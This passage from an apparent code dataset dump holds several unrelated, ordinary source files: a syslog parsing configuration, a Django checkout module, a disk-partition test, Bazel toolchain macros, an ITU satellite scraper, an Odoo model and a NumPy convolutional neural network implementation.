+ SEVERITY + r'>'\n    DATE = r'(?P<year>\d{4})-(?P<month>\d{2})-(?P<day>\d{2})'\n    TIME = r'(?P<hour>\d{2}):(?P<min>\d{2}):(?P<sec>\d{2})(\.(?P<usec>\d{6})){0,1}'\n    TZONE = r'(?P<tzh>\d{2}):(?P<tzm>\d{2})'\n    TIMESTAMP = DATE + r'T' + TIME + r'\+' + TZONE\n    HOST = '(?P<host>.+?)'\n    TAG = '(?P<tag>.+?)(\[(?P<pid>\d+)\]){0,1}:'\n    MESSAGE = r'(?P<message>.*)'\n\n    PATTERN = ' '.join([PREFIX, TIMESTAMP, HOST, TAG, MESSAGE])\n    RE = re.compile(PATTERN)\n\n    BLOCK_TERMINAL = '\\n'\n    BLOCK_PREAMBLE_PATTERN = ' '.join([PREFIX, TIMESTAMP])\n    BLOCK_PREAMBLE_RE = re.compile(BLOCK_PREAMBLE_PATTERN)\n\n    def __call__(self, src_file, offset_b, offset_e, raw):\n        tag = os.path.splitext(os.path.basename(src_file))[0]\n        match = self.RE.match(raw)\n        if not match:\n            raise ValueError('Unable to parse event from %s[%s:%s]' %\n                             (src_file, offset_b, offset_e))\n        usec = match.group('usec')\n        usec = int(usec) if usec is not None else 0\n        timestamp = datetime(\n            year=int(match.group('year')),\n            month=int(match.group('month')),\n            day=int(match.group('day')),\n            hour=int(match.group('hour')),\n            minute=int(match.group('min')),\n            second=int(match.group('sec')),\n            microsecond=usec)\n        event = {\n            'src_file': src_file,\n            'offset_b': offset_b,\n            'offset_e': offset_e,\n            'tag': tag,\n            'severity': match.group('severity').lower(),\n            'timestamp': timestamp,\n            'payload': {\n                'facility_number': int(match.group('facility')),\n                'message': match.group('message'),\n                },\n            }\n        pid = match.group('pid')\n        if pid is not None:\n            event['payload']['pid'] = int(pid)\n        return event\n\n\nclass SyslogJSONParser(SyslogParser):\n    RE = re.compile(SyslogParser.PATTERN, flags=re.DOTALL)\n\n    def __call__(self, src_file, offset_b, offset_e, raw):\n        event = super(SyslogJSONParser, self).__call__(src_file, offset_b, offset_e, raw)\n        event['payload']['message'] = json.loads(event['payload']['message'])\n        return event\n\n\nclass ElasticSearchSink(object):\n    def __init__(self, server, index, type):\n        from pyes import ES\n        self.cxn = ES(server)\n        self.index = index\n        self.type = type\n\n    def __call__(self, event):\n        if isinstance(event, list):\n            self.cxn.bulk_size = len(event)\n            for e in event:\n                self.cxn.index(e, self.index, self.type, bulk=True)\n            self.cxn.flush_bulk()\n        else:\n            self.cxn.index(event, self.index, self.type)\n\n\nELASTIC_SEARCH_SERVER = '127.0.0.1:9200'\n\n\nCONSUMERS = [\n    # app-access\n    {'name': 'app-access',\n     'block_terminal': AccessParser.BLOCK_TERMINAL,\n     'event_parser': AccessParser(),\n     'event_sink': slurp.print_sink,\n     'batch_size': 256,\n     'backfill': False,\n     'patterns': [\n        re.compile(fnmatch.translate('*access.log*')),\n        ],\n     },\n\n    # app-error\n    {'name': 'app-error',\n     'block_preamble': ErrorParser.BLOCK_PREAMBLE_RE,\n     'block_terminal': ErrorParser.BLOCK_TERMINAL,\n     'event_parser': ErrorParser(),\n     'event_sink': slurp.print_sink,\n     'backfill': True,\n     'patterns': [\n        re.compile(fnmatch.translate('*errors.log*')),\n        ],\n     },\n\n    # app-request\n    {'name': 'app-request',\n     'block_preamble': SyslogJSONParser.BLOCK_PREAMBLE_RE,\n     'block_terminal': SyslogJSONParser.BLOCK_TERMINAL,\n     'event_parser': SyslogJSONParser(),\n     'event_sink': slurp.print_sink,\n     'backfill': True,\n     'patterns': [\n        re.compile(fnmatch.translate('*requests.log*')),\n        ],\n     },\n\n    # sys\n    {'name': 'sys',\n     'block_preamble': SyslogParser.BLOCK_PREAMBLE_RE,\n     'block_terminal': SyslogParser.BLOCK_TERMINAL,\n     'event_parser': SyslogParser(),\n     'event_sink': slurp.print_sink,\n     'batch_size': 4096,\n     'backfill': False,\n     'patterns': [\n        re.compile(fnmatch.translate('*/boot.log')),\n        re.compile(fnmatch.translate('*/cron')),\n        
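# Note added for clarity: fnmatch.translate turns a shell glob into a regex\n        # matched against the whole path, e.g. fnmatch.translate('*/cron') gives\n        # roughly '(?s:.*/cron)\Z' (exact output varies across Python versions).\n        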
re.compile(fnmatch.translate('*/haproxy')),\n re.compile(fnmatch.translate('*/mail')),\n re.compile(fnmatch.translate('*/messages')),\n re.compile(fnmatch.translate('*/secure')),\n re.compile(fnmatch.translate('*/postgres')),\n ],\n },\n ]\n","sub_path":"extras/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":8925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"358256441","text":"from django.db.models import Max\n\nfrom ..models import Orders, OrderDetails, ShoppingCart, Customers, Address, Products\nfrom django.utils import timezone\nfrom .CartOps import clearCart\nfrom django.template.loader import render_to_string\nfrom django.core.mail import send_mail, EmailMultiAlternatives\nfrom ..models import OrderDetails\n\ndef createOrder(request):\n date = timezone.now().date()\n status = \"Verwerkt\"\n\n if not request.user.is_authenticated:\n custID = createCustomer(request)\n else:\n custID = request.user.id\n\n orderEntry = Orders(orderNum=getNewOrderNum(), orderDate=date, orderStatus=status, customerID=Customers(customerID=custID))\n orderEntry.save()\n for e in ShoppingCart.objects.all().filter(session_key=request.session.session_key):\n orderDetailsEntry = OrderDetails(amount=e.amount, orderNum=Orders(orderNum=orderEntry.orderNum), productNum=e.prodNum)\n orderDetailsEntry.save()\n\n createAddress(request, custID) #Sla het adres op, of update deze indien nodig\n\n c = request.session['customer_email']\n\n order = OrderDetails.objects.all().filter(orderNum=Orders(orderNum=orderEntry.orderNum)) #Returnt een Array van alle Items die besteld zijn\n html_content = render_to_string('mail/order_complete_email.html', { \"order\" : order })\n text_content = render_to_string('mail/order_complete_email.txt')\n\n for i in order:\n print(\"________________\")\n print(\"Dit is Productnum: \", i.productNum.prodNum)\n print(\"Dit is Amount\", str(i.amount))\n\n prod = Products.objects.get(prodNum=str(i.productNum))\n print(\"Current Stock: \", prod.prodStock)\n prod.prodStock = prod.prodStock - i.amount\n prod.save()\n print(\"New Stock: \", Products.objects.get(prodNum=str(i.productNum)).prodStock)\n\n\n email = EmailMultiAlternatives(\"Orderbevestiging\", text_content, 'noreply@comicfire.com', [c])\n email.attach_alternative(html_content, \"text/html\")\n # email.attach_file('static/images/comicfirelogo2.png')\n email.mixed_subtype = 'related'\n\n email.send()\n\n clearCart(request) #Maak de shoppingcart weer leeg\n\ndef getNewOrderNum():\n maxC = Orders.objects.all().aggregate(Max('orderNum'))\n if maxC.get('orderNum__max') == None:\n return 1\n else:\n return maxC.get('orderNum__max') + 1\n\ndef createCustomer(request):\n customerEntry = Customers(customerID=getNewCustomerNum(), email=request.session['customer_email'], name=request.session['customer_fname'], surname=request.session['customer_lname'], telephone=request.session['customer_phone'], isRegistered=False)\n customerEntry.save()\n return customerEntry.customerID\n\ndef getNewCustomerNum():\n maxC = Customers.objects.all().aggregate(Max('customerID'))\n if maxC.get('customerID__max') == None:\n return 1\n else:\n return maxC.get('customerID__max') + 1\n\ndef createAddress(request, custID):\n if request.user.is_authenticated:\n updateAddress(request, custID)\n else:\n addressEntry = Address(address=request.session['customer_address'], number=request.session['customer_adressnum'], city=request.session['customer_city'], 
postalcode=request.session['customer_postalcode'], customerID=Customers(customerID=custID))\n addressEntry.save()\n\ndef updateAddress(request, custID):\n if not Address.objects.filter(customerID=Customers(customerID=custID)).exists():\n newEntry = Address(address=request.session['customer_address'], number=request.session['customer_adressnum'], city=request.session['customer_city'], postalcode=request.session['customer_postalcode'], customerID=Customers(customerID=custID))\n newEntry.save()\n else:\n existingEntry = Address.objects.get(customerID=Customers(customerID=custID))\n existingEntry.address = request.session['customer_address']\n existingEntry.number=request.session['customer_adressnum']\n existingEntry.city=request.session['customer_city']\n existingEntry.postalcode=request.session['customer_postalcode']\n existingEntry.save()\n\ndef createProduct(request):\n productEntry = Products(prodNum=getNewProductNum(), prodName=request.session['products_prodName'], prodPrice=request.session['products_prodPrice'], prodStock=request.session['products_prodStock'])\n productEntry.save()\n return productEntry.prodNum\n\ndef getNewProductNum():\n maxP = Products.objects.all().aggregate(Max('prodNum'))\n if maxP.get('prodNum__max') == None:\n return 1\n else:\n return maxP.get('prodNum__max') + 1\n\n# def createProductDetails(request, custID):\n# if request.user.is_authenticated:\n# updateAddress(request, custID)\n# else:\n# addressEntry = Address(address=request.session['customer_address'], number=request.session['customer_adressnum'], city=request.session['customer_city'], postalcode=request.session['customer_postalcode'], customerID=Customers(customerID=custID))\n# addressEntry.save()","sub_path":"website/store/database/CheckoutOps.py","file_name":"CheckoutOps.py","file_ext":"py","file_size_in_byte":4979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"285538396","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport pytest\n\nfrom octane import magic_consts\nfrom octane.util import disk as disk_util\n\n\n@pytest.mark.parametrize(\"disk\", [\"sda\", \"sdb\", \"sdc\"])\n@pytest.mark.parametrize(\"size,last_part,end_part\", [\n (10, 1024, 1035),\n (0, 10, 11),\n])\ndef test_create_partition(mocker, mock_ssh_call, mock_ssh_call_output, node,\n size, last_part, end_part, disk):\n mock_part_end = mocker.patch(\"octane.util.disk.parse_last_partition_end\")\n mock_part_end.return_value = last_part\n\n disk_util.create_partition(disk, size, node)\n mock_ssh_call_output.assert_called_once_with(\n ['parted', '/dev/%s' % disk, 'unit', 'MB', 'print'], node=node)\n mock_ssh_call.assert_called_once_with(\n ['parted', '/dev/%s' % disk, 'unit', 'MB', 'mkpart',\n 'custom', 'ext4', str(last_part + 1), str(end_part)], node=node)\n\n\nNODE_DISKS_ATTRIBUTE = [\n {\n 'id': '1',\n 'name': 'disk1',\n }, {\n 'id': '2',\n 'name': 'disk2',\n }\n]\n\n\n@pytest.mark.parametrize(\"disk_attrs\", [\n NODE_DISKS_ATTRIBUTE,\n None,\n])\ndef test_create_configdrive_partition(mocker, node, disk_attrs):\n name = 'disk1'\n node.mock_add_spec(['get_attribute'])\n node.data = {\"id\": \"1\"}\n node.get_attribute.return_value = disk_attrs\n mock_create_part = mocker.patch(\"octane.util.disk.create_partition\")\n if disk_attrs:\n disk_util.create_configdrive_partition(node)\n mock_create_part.assert_called_once_with(\n name, magic_consts.CONFIGDRIVE_PART_SIZE, node)\n else:\n with pytest.raises(disk_util.NoDisksInfoError):\n disk_util.create_configdrive_partition(node)\n","sub_path":"octane/tests/test_util_disk.py","file_name":"test_util_disk.py","file_ext":"py","file_size_in_byte":2198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"572562788","text":"\"\"\"A module defining the various toolchain definitions for `rules_foreign_cc`\"\"\"\n\nload(\":built_toolchains.bzl\", _built_toolchains = \"built_toolchains\")\nload(\":prebuilt_toolchains.bzl\", _prebuilt_toolchains = \"prebuilt_toolchains\")\n\n# Re-expose the built toolchains macro\nbuilt_toolchains = _built_toolchains\n\n# Re-expose the prebuilt toolchains macro\nprebuilt_toolchains = _prebuilt_toolchains\n\n# buildifier: disable=unnamed-macro\ndef preinstalled_toolchains():\n \"\"\"Register toolchains for various build tools expected to be installed on the exec host\"\"\"\n native.register_toolchains(\n str(Label(\"//toolchains:preinstalled_cmake_toolchain\")),\n str(Label(\"//toolchains:preinstalled_make_toolchain\")),\n str(Label(\"//toolchains:preinstalled_ninja_toolchain\")),\n )\n","sub_path":"toolchains/toolchains.bzl","file_name":"toolchains.bzl","file_ext":"bzl","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"304505612","text":"#!/bin/python3\n\"\"\"This script retrieves csv file with the list of satellites,\nand Excel files with their parameters \n\"\"\"\n\nfrom bs4 import BeautifulSoup\nimport requests\nimport pandas as pd\nimport xlwt\nimport os.path\n\nsave_path = '/home/rustam/MyGit/Downloaded Data'\n\nsatlist_url = 
\"https://www.itu.int/online/snl/freqrnge_snl.sh?plan=&lblfreq1=Frequency+%5BMHz%5D%3A+&lblfreq11=+from+&freq_low=0&lblfreq2=+to+&freq_hi=100000&lblemi0=Emission%2FReception%3A+&lblemi1=Emission+&lblemi2=Reception+&emi=&lblemi3=All+&lbllong1=Longitude%3A+&lbllong2=+from+&long_from=-180&lbllong3=+%A0+%A0+to++&long_to=180&lblstn=Space+or+Earth%3A+&lblcateg1=Geostationary&categ=N&lblcateg2=Non-geostationary&lblcateg3=Earth+station&lblsub=Submission+reason%3A+&lblsub1=API&lblsub2=Coordination&lblsub3=Notification&ntf=&lblsub4=All&sub0=Select&ie=y\"\n\n# the search result from ITU website\n\nraw_html_data = requests.get(satlist_url).text\nsoup = BeautifulSoup(raw_html_data,\"html.parser\")\n\n#print(soup.prettify())\n\ntable1 = soup.find_all('table')[1]\nsat_rows = table1.find_all('tr')[0:]\nsat_names = [] # a list to store all names of satellites\nurls = [] # a list to store links to pages with satellite parameters\nprint ('Number of satellites = ', len(sat_rows))\n\n# getting satellite names from table1\nfor i in range(2,len(sat_rows)-2):\n sat_rows[i].find_all('td',text=True)\n #len(sat_rows[i].find_all('td',text=True))\n sat_names.append((sat_rows[i].find_all('td',text=True))[1].get_text())\n sat_names.append(str((sat_rows[i].find_all('td',text=True))[1].get_text()))\n\n\nfor link in soup.findAll('a', href=True, text='view'):\n urls.append('http://www.itu.int' + link['href'])\n\ndel sat_names[::2] \n\n\n\n# print('\\n'.join(sat_names))\n# print('\\n'.join(urls)) \n\n\ntest_url = \"http://www.itu.int/online/snl/satbandold_snl.sh?ntc_id=115500120&fr1=2000&fr2=8000&ie=y&sat_type=&sat_name=SAUDISAT-6&sel_satname=SAUDISAT-6&plan_id=\"\n\ntest_sat = 'SAUDISAT-6'\n\n\ndef parse_sat_params(url, name):\n\t\"\"\"This function reads url and name of the satellite, opens the url and saves all parameters to the Excel file with the name of satellite + xls extention\n\t\n\t\"\"\"\n\tr = requests.get(url)\n\tdata = r.text.encode('utf-8')\n\tsoup = BeautifulSoup(data,\"html.parser\")\n\n\ttable = soup.find_all('table')[0]\n\trows = table.find_all('tr')[0:]\n\n\t# print(rows)\n\t#print(\"\\n\")\n\n\trow = []\n\tcolumn_names = []\n\n\tNumLines = len(rows) - 2\n\n\t\n\n\tworkbook = xlwt.Workbook()\n\tsheet1 = workbook.add_sheet('Parameters')\n\n\n\tfor i in range(0,7):\n\t\tcolumn_names.append(((rows[1].find_all('td',text=True))[i].get_text())) # line with names of columns\n\t\tsheet1.write(0, i, column_names[i]) \n\n\t\tj = 0\n\n\t\twhile( j < (NumLines - 1) ):\n\t\t\trow.append([])\n\t\t\trow[j].append( [ (rows[j + 3].find_all('td',text=True))[i].get_text() ] ) # first line with data\n\t\t\tsheet1.write(j+1, i, row[j][i])\n\t\t\tj += 1\n\n\tcompleteName = os.path.join(save_path, name + \".xls\")\n\tworkbook.save(completeName)\n\n\nparse_sat_params(test_url, test_sat)\n\n\nfor i in range(76, len(sat_rows)):\n try: \n \tparse_sat_params(urls[i], sat_names[i])\n \tprint ('loaded data of ', sat_names[i], ' satellite... #', i)\n except:\n \tprint ('failed to load date of', sat_names[i], ' satellite... 
#', i)","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":3203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"54037863","text":"# -*- coding: utf-8 -*-\n# © 2016 OpenSynergy Indonesia\n# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html).\n\nfrom odoo import fields, models\n\n\nclass StockPickingType(models.Model):\n _inherit = 'stock.picking.type'\n move_type=fields.Char(String='move type')\n\n","sub_path":"e2yun_addons/odoo12/srm_base/models/stock_picking_type.py","file_name":"stock_picking_type.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"199395689","text":"import numpy as np\r\n# 获取卷积区域\r\ndef get_patch(input_array,i,j,filter_width,filter_height,stride):\r\n '''\r\n 从输入数组中获取本次卷积的区域,\r\n 自动适配输入为2D和3D的情况\r\n '''\r\n start_i=i*stride\r\n start_j=j*stride\r\n if input_array.ndim==2:\r\n return input_array[start_i:start_i+filter_height,start_j:start_j+filter_width]\r\n elif input_array.ndim==3:\r\n return input_array[:,start_i:start_i+filter_height,start_j:start_j+filter_width]\r\n# 卷积层\r\nclass ConvLayer(object):\r\n # 在构造函数中设置卷积层的超参数\r\n # input_width:输入宽度 unput_height:输入高度 channel_number:深度 filter_width:filter宽度 filter_height:filter高度 filtet_number:filter个数\r\n # zero_padding:原始图像周围补几圈0, 1是补一圈0 stride:步幅 activator:激活函数 learning_rate:学习率 output_array:输出队列\r\n def __init__(self,input_width,input_height,channel_number,filter_width,filter_height,filter_number,zero_padding,stride,activator,learning_rate):\r\n self.input_width=input_width\r\n self.input_height=input_height\r\n self.channel_number=channel_number\r\n self.filter_width=filter_width\r\n self.filter_height=filter_height\r\n self.filter_number=filter_number\r\n self.zero_padding=zero_padding\r\n self.stride=stride\r\n self.output_width=ConvLayer.calculate_output_size(self.input_width,filter_width,zero_padding,stride)\r\n self.output_height=ConvLayer.calculate_output_size(self.input_height,filter_height,zero_padding,stride)\r\n # 三维矩阵 (深度,行数,列数)\r\n self.output_array=np.zeros((self.filter_number,self.output_height,self.output_width))\r\n # filter的个数 每个filter都有长度宽度深度三部分\r\n self.filters=[]\r\n for i in range(filter_number):\r\n self.filters.append(Filter(filter_width,filter_height,self.channel_number))\r\n self.activator=activator\r\n self.learning_rate=learning_rate\r\n # 静态方法不需要经过实例化就可以调用,==普通方法\r\n @staticmethod\r\n # 计算输出举证的长度和宽度\r\n def calculate_output_size(input_size,filter_size,zero_padding,stride):\r\n return int((input_size-filter_size+2*zero_padding)/stride+1)\r\n def forward(self,input_array):\r\n '''\r\n 计算卷积层的输出\r\n 输出结果保存在self.output_array\r\n '''\r\n self.input_array=input_array\r\n self.padded_input_array=padding(input_array,self.zero_padding)\r\n for f in range(self.filter_number):\r\n filter=self.filters[f]\r\n conv(self.padded_input_array,filter.get_weights(),self.output_array[f],self.stride,filter.get_bias())\r\n # 调用激活函数 修改矩阵的值(其实是减少for循环)\r\n element_wise_op(self.output_array,self.activator.forward)\r\n def backward(self,input_array,sensitivity_array,activator):\r\n '''计算传递给前一层的误差项,以及计算每个权重的提前一层的误差项保存在self.delta_array 梯度保存在Filter对象的weights_grad'''\r\n self.forward(input_array)\r\n # 计算input的误差项\r\n self.bp_sensitivity_map(sensitivity_array,activator)\r\n # 计算filter的误差项\r\n self.bp_gradient(sensitivity_array)\r\n # 根据这一层的误差项求上一层的误差项\r\n def bp_sensitivity_map(self,sensitivity_array,activator):\r\n '''\r\n 
Compute the sensitivity map passed to the previous layer\r\n        sensitivity_array: this layer's sensitivity map\r\n        activator: the previous layer's activation function\r\n        '''\r\n        # Handle the stride: expand the original sensitivity map\r\n        expanded_array=self.expand_sensitivity_map(sensitivity_array)\r\n        # Full convolution: zero-pad the sensitivity map\r\n        # (the zero-padding cells of the original input also receive residuals,\r\n        # but those are never propagated further, so they are not computed)\r\n        expanded_width=expanded_array.shape[2]\r\n        # Formula for the sensitivity map's zp (zp = rings of zero padding)\r\n        zp=int((self.input_width+self.filter_width-1-expanded_width)/2)\r\n        padded_array=padding(expanded_array,zp)\r\n        # Initialize delta_array, which stores the sensitivity map passed to the previous layer\r\n        self.delta_array=self.create_delta_array()\r\n        # For a convolution layer with several filters, the sensitivity map passed\r\n        # to the previous layer is the sum of the sensitivity maps of all filters\r\n        for f in range(self.filter_number):\r\n            filter=self.filters[f]\r\n            # Rotate the filter weights by 180 degrees\r\n            flipped_weights=np.array(list(map(lambda i:np.rot90(i,2),filter.get_weights())))\r\n            # Compute the delta_array corresponding to one filter\r\n            delta_array=self.create_delta_array()\r\n            for d in range(delta_array.shape[0]):\r\n                conv(padded_array[f],flipped_weights[d],delta_array[d],1,0)\r\n            self.delta_array+=delta_array\r\n        # Multiply the result element-wise by the derivative of the activation function\r\n        derivative_array=np.array(self.input_array)\r\n        element_wise_op(derivative_array,activator.backward)\r\n        # This yields the previous layer's sensitivity map\r\n        self.delta_array*=derivative_array\r\n    # expand_sensitivity_map \"restores\" a stride-S sensitivity map to its stride-1 form\r\n    def expand_sensitivity_map(self,sensitivity_array):\r\n        depth=sensitivity_array.shape[0]\r\n        # Determine the size of the expanded sensitivity map,\r\n        # i.e. the size the sensitivity map would have with stride 1\r\n        expanded_width=(self.input_width-self.filter_width+2*self.zero_padding+1)\r\n        expanded_height=(self.input_height-self.filter_height+2*self.zero_padding+1)\r\n        # Build the new sensitivity map\r\n        expand_array=np.zeros((depth,expanded_height,expanded_width))\r\n        # Copy the error values over from the original sensitivity map\r\n        for i in range(self.output_height):\r\n            for j in range(self.output_width):\r\n                i_pos=i*self.stride\r\n                j_pos=j*self.stride\r\n                expand_array[:,i_pos,j_pos]=sensitivity_array[:,i,j]\r\n        return expand_array\r\n    # create_delta_array allocates the array holding the sensitivity map passed to the previous layer\r\n    def create_delta_array(self):\r\n        return np.zeros((self.channel_number,self.input_height,self.input_width))\r\n    # Compute the gradients\r\n    def bp_gradient(self,sensitivity_array):\r\n        # Handle the stride: expand the original sensitivity map\r\n        expanded_array=self.expand_sensitivity_map(sensitivity_array)\r\n        for f in range(self.filter_number):\r\n            # Compute the gradient of every weight\r\n            filter=self.filters[f]\r\n            for d in range(filter.weights.shape[0]):\r\n                conv(self.padded_input_array[d],expanded_array[f],filter.weights_grad[d],1,0)\r\n            # Compute the gradient of the bias term\r\n            filter.bias_grad=expanded_array[f].sum()\r\n    def update(self):\r\n        '''\r\n        Update the weights by gradient descent\r\n        '''\r\n        for filter in self.filters:\r\n            filter.update(self.learning_rate)\r\n# Apply an element-wise operation to a numpy array in place\r\ndef element_wise_op(array,op):\r\n    for i in np.nditer(array,op_flags=['readwrite']):\r\n        i[...]=op(i)\r\n# output_array is 2D; fill it with the convolution output\r\ndef conv(input_array,kernel_array,output_array,stride,bias):\r\n    '''Compute the convolution; automatically handles 2D and 3D inputs'''\r\n    output_width=output_array.shape[1]\r\n    output_height=output_array.shape[0]\r\n    kernel_width=kernel_array.shape[-1]\r\n    kernel_height=kernel_array.shape[-2]\r\n    for i in range(output_height):\r\n        for j in range(output_width):\r\n            output_array[i][j]=(get_patch(input_array,i,j,kernel_width,kernel_height,stride)*kernel_array).sum()+bias\r\n# zp is the number of zero rings to add\r\n# padding pads zp rings of zeros around the input; handles 2D and 3D inputs\r\ndef padding(input_array,zp):\r\n    '''Add zero padding to an array; automatically handles 2D and 3D inputs'''\r\n    if zp==0:\r\n        return input_array\r\n    else:\r\n        # ndim is the number of array dimensions\r\n        if 
input_array.ndim==3:\r\n            # Rows are the height, columns the width\r\n            input_width=input_array.shape[2]\r\n            input_height = input_array.shape[1]\r\n            input_depth = input_array.shape[0]\r\n            padded_array=np.zeros((input_depth,input_height+2*zp,input_width+2*zp))\r\n            padded_array[:,zp:zp+input_height,zp:zp+input_width]=input_array\r\n            return padded_array\r\n        elif input_array.ndim==2:\r\n            input_width=input_array.shape[1]\r\n            input_height=input_array.shape[0]\r\n            padded_array=np.zeros((input_height+2*zp,input_width+2*zp))\r\n            padded_array[zp:zp+input_height,zp:zp+input_width]=input_array\r\n            return padded_array\r\nclass Filter(object):\r\n    def __init__(self,width,height,depth):\r\n        # weights and bias term\r\n        self.weights=np.random.uniform(-1e-4,1e-4,(depth,height,width))\r\n        self.bias=0\r\n        # gradient of the filter weights\r\n        self.weights_grad=np.zeros(self.weights.shape)\r\n        # gradient of the filter bias\r\n        self.bias_grad=0\r\n    def __repr__(self):\r\n        return 'filter weights:\\n%s\\nbias:\\n%s' % (repr(self.weights), repr(self.bias))\r\n    def get_weights(self):\r\n        return self.weights\r\n    def get_bias(self):\r\n        return self.bias\r\n    # Update the weights with gradient descent\r\n    def update(self,learning_rate):\r\n        self.weights-=learning_rate*self.weights_grad\r\n        self.bias-=learning_rate*self.bias_grad\r\n\r\n# Activation function\r\nclass IdentityActivator(object):\r\n    def forward(self, weighted_input):\r\n        return weighted_input\r\n\r\n    # Derivative of the function\r\n    def backward(self, output):\r\n        return 1\r\n# Activation function\r\nclass ReluActivator(object):\r\n    def forward(self,weighted_input):\r\n        return max(0,weighted_input)\r\n    def backward(self,output):\r\n        return 1 if output>0 else 0\r\n# Build the test fixtures\r\ndef init_test():\r\n    a = np.array(\r\n        [[[0, 1, 1, 0, 2],\r\n          [2, 2, 2, 2, 1],\r\n          [1, 0, 0, 2, 0],\r\n          [0, 1, 1, 0, 0],\r\n          [1, 2, 0, 0, 2]],\r\n         [[1, 0, 2, 2, 0],\r\n          [0, 0, 0, 2, 0],\r\n          [1, 2, 1, 2, 1],\r\n          [1, 0, 0, 0, 0],\r\n          [1, 2, 1, 1, 1]],\r\n         [[2, 1, 2, 0, 0],\r\n          [1, 0, 0, 1, 0],\r\n          [0, 2, 1, 0, 1],\r\n          [0, 1, 2, 2, 2],\r\n          [2, 1, 0, 0, 1]]])\r\n    # b is the error term (sensitivity map)\r\n    b = np.array(\r\n        [[[0,1,1],\r\n          [2,2,2],\r\n          [1,0,0]],\r\n         [[1,0,2],\r\n          [0,0,0],\r\n          [1,2,1]]])\r\n    # Initialize the hyper-parameters\r\n    cl = ConvLayer(5,5,3,3,3,2,1,2,IdentityActivator(),0.001)\r\n    # Initialize the filter weights\r\n    cl.filters[0].weights = np.array(\r\n        [[[-1,1,0],\r\n          [0,1,0],\r\n          [0,1,1]],\r\n         [[-1,-1,0],\r\n          [0,0,0],\r\n          [0,-1,0]],\r\n         [[0,0,-1],\r\n          [0,1,0],\r\n          [1,-1,-1]]], dtype=np.float64)\r\n    # Initialize the filter bias\r\n    cl.filters[0].bias=1\r\n    cl.filters[1].weights = np.array(\r\n        [[[1,1,-1],\r\n          [-1,-1,1],\r\n          [0,-1,1]],\r\n         [[0,1,0],\r\n          [-1,0,-1],\r\n          [-1,1,0]],\r\n         [[-1,0,0],\r\n          [-1,0,1],\r\n          [-1,0,0]]], dtype=np.float64)\r\n    cl.filters[1].bias = 0\r\n    return a, b, cl\r\ndef gradient_check():\r\n    '''Gradient check'''\r\n    # Use the sum of all output nodes as the error function\r\n    error_function=lambda o:o.sum()\r\n    # Run the forward pass\r\n    a,b,cl=init_test()\r\n    cl.forward(a)\r\n    # The sensitivity map is an all-ones array\r\n    sensitivity_array = np.ones(cl.output_array.shape,\r\n                                dtype=np.float64)\r\n    # Compute the gradients\r\n    cl.backward(a, sensitivity_array,IdentityActivator())\r\n    # Check the gradients\r\n    epsilon = 10e-4\r\n    for d in range(cl.filters[0].weights_grad.shape[0]):\r\n        for i in range(cl.filters[0].weights_grad.shape[1]):\r\n            for j in range(cl.filters[0].weights_grad.shape[2]):\r\n                cl.filters[0].weights[d,i,j] += epsilon\r\n                cl.forward(a)\r\n                err1 = error_function(cl.output_array)\r\n                cl.filters[0].weights[d,i,j] -= 2*epsilon\r\n                cl.forward(a)\r\n                err2 = error_function(cl.output_array)\r\n                expect_grad = (err1 - err2) / (2 * epsilon)\r\n                cl.filters[0].weights[d,i,j] += epsilon\r\n                print('weights(%d,%d,%d): expected - actual %f - %f' % (d, i, j, expect_grad, 
cl.filters[0].weights_grad[d,i,j]))\r\n# pooling层\r\nclass MaxPoolingLayer(object):\r\n def __init__(self,input_width,input_height,channel_number,filter_width,filter_height,stride):\r\n self.input_width=input_width\r\n self.input_height=input_height\r\n self.channel_number=channel_number\r\n self.filter_width=filter_width\r\n self.filter_height=filter_height\r\n self.stride=stride\r\n self.output_width=int((input_width-filter_width)/self.stride+1)\r\n self.output_height=int((input_height-filter_height)/self.stride+1)\r\n self.output_array=np.zeros((self.channel_number,self.output_height,self.output_width))\r\n def forward(self,input_array):\r\n for d in range(self.channel_number):\r\n for i in range(self.output_height):\r\n for j in range(self.output_width):\r\n self.output_array[d,i,j]=(get_patch(input_array[d],i,j,self.filter_width,self.filter_height,self.stride).max())\r\n def backward(self,input_array,sensitivity_array):\r\n self.delta_array=np.zeros(input_array.shape)\r\n for d in range(self.channel_number):\r\n for i in range(self.output_height):\r\n for j in range(self.output_width):\r\n patch_array=get_patch(input_array[d],i,j,self.filter_width,self.filter_height,self.stride)\r\n k,l=get_max_index(patch_array)\r\n self.delta_array[d,i*self.stride+k,j*self.stride+l]=sensitivity_array[d,i,j]\r\n\r\n\r\ndef test():\r\n a, b, cl = init_test()\r\n cl.forward(a)\r\n print(cl.output_array)\r\n\r\ndef test_bp():\r\n a, b, cl = init_test()\r\n cl.backward(a, b, IdentityActivator())\r\n cl.update()\r\n print(cl.filters[0])\r\n print(cl.filters[1])\r\n\r\ndef init_pool_test():\r\n a = np.array(\r\n [[[1,1,2,4],\r\n [5,6,7,8],\r\n [3,2,1,0],\r\n [1,2,3,4]],\r\n [[0,1,2,3],\r\n [4,5,6,7],\r\n [8,9,0,1],\r\n [3,4,5,6]]], dtype=np.float64)\r\n\r\n b = np.array(\r\n [[[1,2],\r\n [2,4]],\r\n [[3,5],\r\n [8,2]]], dtype=np.float64)\r\n\r\n mpl = MaxPoolingLayer(4,4,2,2,2,2)\r\n\r\n return a, b, mpl\r\n\r\n\r\ndef test_pool():\r\n a, b, mpl = init_pool_test()\r\n mpl.forward(a)\r\n 